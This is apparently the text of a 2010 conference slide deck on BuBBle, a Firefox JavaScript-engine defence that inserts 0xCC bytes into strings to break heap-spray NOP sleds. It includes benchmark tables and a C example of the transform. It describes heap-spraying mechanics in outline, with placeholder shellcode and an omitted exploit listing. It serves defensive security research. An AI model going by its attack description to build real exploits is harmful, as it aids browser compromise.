BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
Paper accepted and presented @ ESSoS 2010 Pisa (Italy)
3-4-5 February 2010

1. BuBBle: a Javascript countermeasure against heap-spraying attacks
   Francesco Gadaleta - Yves Younan - Wouter Joosen
   Katholieke Universiteit Leuven
   ESSoS 2010, Pisa, 3-4 Feb.
2. Overview
   ‣ Heap-spraying attacks
   ‣ BuBBle approach
   ‣ Experiments and Results
   ‣ Conclusion
3-5. A new target: web browsers
6. Firefox vulnerabilities
   http://www.mozilla.org/security/known-vulnerabilities/firefox35.html
   • Integer overflow
   • Memory corruption
   • Crash and remote code execution
   • Flash player unloading
   • Heap buffer overflow in string to number conversion
7. Problem description: the art of spraying the heap
8-9. Problem description: the art of spraying the heap
   [figure: sprayed heap. The heap is filled with large blocks of 0x90 bytes (NOP sleds), each ending in SHELLCODE.]
10-13. Heap-spraying attacks: assumptions
   • A buffer overflow/memory corruption vulnerability
   • Users allowed to allocate memory
   • Homogeneity of memory
14. BuBBle approach: Tracemonkey internals
   Homogeneity of memory -> monolithical data structure
   • Javascript Strings
15-16. BuBBle approach: the JSString type (Tracemonkey - Mozilla Firefox 3.7)
   [figure: Tracemonkey internals. A JSString holds mLength and mChars; mChars points to one contiguous character array, shown filled with 0x90 bytes ending in SHELLCODE.]
17. BuBBle approach
   • Introduce diversity in contiguous blocks of memory
   • transform Javascript strings (internal structure)
18-23. BuBBle approach (animation build)
   <Define string>
   Hi. I am a dangerous string to jump into a shellcode
   Transform
   Hi. I am a dangerous string to jump into a shellcode   (transformed copy; the changed characters are kept in a <support data structure>)
   <Use string>
   Restore
   Hi. I am a dangerous string to jump into a shellcode
24-25. BuBBle approach: support data
   • Interrupt array of characters
   • Change characters at random positions: how many?
   • Save support data
   Support data layout: Num. intervals | Pos. 1st char | Value 1st char | Pos. 2nd char | Value 2nd char | ...
26-30. BuBBle approach: js_Transform()
   Input:  “blah blah blah is a normal string with appended shellcode”

   rand <- generate_random_position(0, MINLEN)        rand = 8
   len <- string.length()                              len = 57
   intervals <- len/MINLEN                             intervals = 2
   foreach (i in intervals)
       pos = MINLEN*i
       save_position(pos+rand)
       save_value(character[pos+rand])
       change_value(character[pos + rand])

   Support data after the run: 2 | 7 | a | 35 | w
   Output: “blah bl0xCCh blah is a normal string 0xCCith appended shellcode”
31. BuBBle approach: security evaluation
   • What? We still spray the heap!
   • Interrupt procedure call (.byte 0xcc)
   • IE and Aurora against Google (Jan 2010)
32. Aurora-Google (1-0)
   [listing: the Aurora exploit page (HTML/JavaScript with an unescape()-encoded sprayed payload), omitted]
33. BuBBle: performance benchmarks
   • Macrobenchmarks
   • Sunspider Benchmark Suite
   • V8
   • PeaceKeeper bench.
   • Memory overhead analysis
34. Performance overhead

   V8 Javascript Benchmarks
   Benchmark     Perf. overhead
   Richards      5.6%
   DeltaBlue     3.6%
   Crypto        10%
   Ray Trace     1.5%
   Early Boyer   3.7%
   RegExp        0.6%
   Splay         1.8%
   Total         2.6%

   Macrobenchmarks
   Site URL          Perf. overhead
   economist.com     5.6%
   amazon.com        4.7%
   ebay.com          4.2%
   facebook.com      4.9%
   maps.google.com   3.2%
   docs.google.com   6.3%
   cnn.com           4.8%
   youtube.com       4.9%
   Average           4.8%

   Sunspider Javascript Benchmark Suite
   Test          Perf. overhead
   3d            0.17%
   bitops        0.89%
   controlflow   1.44%
   math          0.62%
   regexp        0.23%
   string
     base64      27.3%
     fasta       1.24%
     tagcloud    2.20%
     unpack      3.24%
     validate    9.30%
   Total         2.8%

   Peacekeeper Javascript Benchmarks
   Benchmark           Perf. overhead
   Rendering           0.5%
   Social Networking   0.5%
   Complex Graphics    2.2%
   Data                14%
   DOM ops.            0.2%
   Text parsing        2.0%
   Average             5.19%
35-36. BuBBle: memory overhead
   • 1/24 changes
   • n-byte original string
   • i = n/24
   • support data structure 2i bytes long
   • 8.3% memory overhead (theoretical and room for improvement)

   Memory overhead analysis from proc file system
   Benchmark     Mem. overhead
   Sunspider     5.6%
   V8            4.2%
   Peacekeeper   6.5%
   Average       5.3%
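The js_Transform() step of slides 26-30 and the support-data accounting of slides 35-36, as an added C example that is not code from the BuBBle implementation or the Tracemonkey source: MINLEN and the random offset are parameters so a run is reproducible, the type and function names (bubble_support, bubble_transform, bubble_restore, bubble_longest_clean_run, bubble_support_overhead) are this example's own, and the 120-byte 0x90 buffer in the self-check is constructed sample input.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* 0xCC is the x86 int3 opcode: a jump that lands in a transformed sled traps
 * instead of sliding on (slide 31: "Interrupt procedure call (.byte 0xcc)"). */
#define BUBBLE_INT3 0xCC

/* Support data (slides 24-25): interval count, then per interval the changed
 * position and its original value. Names are this example's own. */
typedef struct {
    size_t   intervals;
    size_t  *pos;
    uint8_t *val;
} bubble_support;

void bubble_support_free(bubble_support *sd)
{
    free(sd->pos); free(sd->val);
    sd->pos = NULL; sd->val = NULL; sd->intervals = 0;
}

/* js_Transform() as on slide 26, with MINLEN and the random offset r passed in
 * so a run is reproducible: in each of len/minlen intervals the byte at
 * minlen*i + r is saved and replaced by 0xCC. Returns 0 on success. */
int bubble_transform(uint8_t *buf, size_t len, size_t minlen, size_t r,
                     bubble_support *sd)
{
    if (buf == NULL || sd == NULL || minlen == 0 || r >= minlen) return -1;
    sd->intervals = len / minlen;
    sd->pos = calloc(sd->intervals + 1, sizeof *sd->pos);
    sd->val = calloc(sd->intervals + 1, sizeof *sd->val);
    if (sd->pos == NULL || sd->val == NULL) {
        bubble_support_free(sd);
        return -1;
    }
    for (size_t i = 0; i < sd->intervals; i++) {
        size_t p = minlen * i + r;  /* < len, since i < len/minlen, r < minlen */
        sd->pos[i] = p;
        sd->val[i] = buf[p];
        buf[p] = BUBBLE_INT3;
    }
    return 0;
}

/* Restore (slides 19-23): put the saved bytes back before the string is used.
 * Returns -1 if the support data does not fit the buffer. */
int bubble_restore(uint8_t *buf, size_t len, const bubble_support *sd)
{
    if (buf == NULL || sd == NULL) return -1;
    for (size_t i = 0; i < sd->intervals; i++)
        if (sd->pos[i] >= len)
            return -1;
    for (size_t i = 0; i < sd->intervals; i++)
        buf[sd->pos[i]] = sd->val[i];
    return 0;
}

/* Longest run without an 0xCC: the longest uninterrupted sled that survives
 * the transform (at most minlen - 1 inside the covered part). */
size_t bubble_longest_clean_run(const uint8_t *buf, size_t len)
{
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == BUBBLE_INT3) ? 0 : run + 1;
        if (run > best) best = run;
    }
    return best;
}

/* Support-data size relative to an n-byte string, counted as on slide 35:
 * i = n/minlen entries of one position byte plus one value byte = 2i bytes,
 * i.e. 2/24 = 8.3% for minlen 24 (this struct's size_t positions cost more). */
double bubble_support_overhead(size_t n, size_t minlen)
{
    if (n == 0 || minlen == 0) return 0.0;
    return (2.0 * (double)(n / minlen)) / (double)n;
}

/* Self-check on a constructed 120-byte buffer of 0x90 standing in for one
 * sprayed block: with minlen 24 and r 7 five bytes change, no clean run exceeds
 * 23 bytes, and restore gives the original back. Returns 1 if all hold. */
int bubble_selfcheck(void)
{
    uint8_t sled[120], orig[120];
    bubble_support sd;
    memset(sled, 0x90, sizeof sled);
    memcpy(orig, sled, sizeof orig);
    if (bubble_transform(sled, sizeof sled, 24, 7, &sd) != 0) return 0;
    int ok = sd.intervals == 5 && sd.pos[4] == 103 && sd.val[4] == 0x90 &&
             sled[7] == BUBBLE_INT3 &&
             bubble_longest_clean_run(sled, sizeof sled) == 23;
    ok = ok && bubble_restore(sled, sizeof sled, &sd) == 0 &&
         memcmp(sled, orig, sizeof orig) == 0;
    bubble_support_free(&sd);
    return ok;
}
```

bubble_longest_clean_run is the defender-side check the deck implies: after the transform no sled longer than MINLEN - 1 bytes remains inside the covered part of a string, whatever offset the attacker guesses.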
37. Related work
   • ASLR: Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: An efficient approach to combat a broad range of memory error exploits. Proceedings of the 12th USENIX Security Symposium, Washington, D.C., U.S.A., August 2003
   • DEP: Data Execution Prevention: Windows Server 2003 with SP1
   • Nozzle: Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: A defense against heap-spraying code injection attacks. Technical report, Microsoft Research (November 2008)
   • Shellcode detection: Egele, M., Wurzinger, P., Kruegel, C., Kirda, E.: Defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) Detection of Intrusions and Malware, and Vulnerability Assessment. LNCS, vol. 5587, pp. 88-106. Springer, Heidelberg (2009)
38. Conclusion
   • Lightweight solution (e.g. Mozilla Firefox, Mozilla Fennec)
   • Implemented for Javascript strings
   • Allocation of malicious objects from external media (mp3, ...)
   • Future dev: protect arrays of integers, protect other engines
   • Not just for browsers
39. ?